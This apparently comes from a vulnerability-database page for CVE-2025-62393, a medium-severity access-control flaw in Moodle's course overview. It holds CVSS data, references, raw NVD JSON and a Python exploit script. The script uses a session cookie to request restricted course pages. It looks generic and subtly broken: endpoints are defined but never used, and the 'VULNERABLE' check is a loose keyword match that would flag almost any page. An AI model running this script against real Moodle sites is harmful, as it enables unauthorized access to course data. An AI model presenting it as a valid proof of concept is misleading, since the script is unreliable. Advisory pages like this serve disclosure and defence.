CVE-2025-62393

Description

A flaw was found in the course overview output function where user access permissions were not fully enforced. This could allow unauthorized users to view information about courses they should not have access to, potentially exposing limited course details.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* - VULNERABLE

Moodle LMS 受影响版本（具体版本需查看官方公告）

Red Hat OpenStack Platform (根据Red Hat Bugzilla 2404426)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62393 PoC - Moodle Course Overview Access Control Bypass
# This PoC demonstrates the permission bypass in course overview output function

import requests
import sys

def exploit_moodle_cve_2025_62393(target_url, course_id, session_cookie):
    """
    Exploit for CVE-2025-62393: Moodle course overview access control bypass
    
    Requirements:
    - Valid low-privilege user session
    - Target course ID that user should not have access to
    
    Usage:
    python exploit.py <target_url> <course_id> <session_cookie>
    """
    headers = {
        'Cookie': f'MoodleSession={session_cookie}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    # Method 1: Direct course overview page access
    overview_url = f"{target_url}/course/overview.php?id={course_id}"
    
    # Method 2: Dashboard course overview endpoint
    dashboard_url = f"{target_url}/my/"
    
    # Method 3: Web service API endpoint
    api_url = f"{target_url}/lib/ajax/service.php?sesskey=&info=core_course_get_courses"
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Course ID: {course_id}")
    
    # Attempt to access restricted course overview
    try:
        response = requests.get(overview_url, headers=headers, timeout=10)
        
        if response.status_code == 200:
            # Check if course information is returned without proper authorization
            if 'course' in response.text.lower() or 'enrolled' in response.text.lower():
                print("[+] VULNERABLE: Course information exposed without proper authorization")
                print(f"[+] Response length: {len(response.text)} bytes")
                return True
            else:
                print("[-] Course info not found in response")
                return False
        else:
            print(f"[-] HTTP {response.status_code}")
            return False
            
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python exploit.py <target_url> <course_id> <session_cookie>")
        sys.exit(1)
    
    exploit_moodle_cve_2025_62393(sys.argv[1], sys.argv[2], sys.argv[3])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62393
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62393
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62393/
[4] VulDB https://vuldb.com/cve/CVE-2025-62393
[5] https://access.redhat.com/security/cve/CVE-2025-62393
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2404426
[7] https://moodle.org/mod/forum/discuss.php?d=470381

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62393", "sourceIdentifier": "[email protected]", "published": "2025-10-23T12:15:31.073", "lastModified": "2025-11-14T19:39:55.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the course overview output function where user access permissions were not fully enforced. This could allow unauthorized users to view information about courses they should not have access to, potentially exposing limited course details."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.3", "matchCriteriaId": "672DBB86-D5A8-41B6-B6F3-8E323E9C21F0"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-62393", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2404426", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://moodle.org/mod/forum/discuss.php?d=470381", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}